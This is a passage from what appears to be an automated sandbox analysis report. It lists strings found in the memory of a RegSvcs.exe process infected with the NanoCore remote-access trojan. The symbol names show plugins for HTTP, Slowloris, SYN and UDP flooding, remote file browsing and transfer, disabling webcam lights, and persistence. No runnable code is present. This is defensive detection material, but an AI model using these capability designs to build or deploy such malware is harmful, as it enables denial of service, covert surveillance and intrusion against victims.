xceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttribu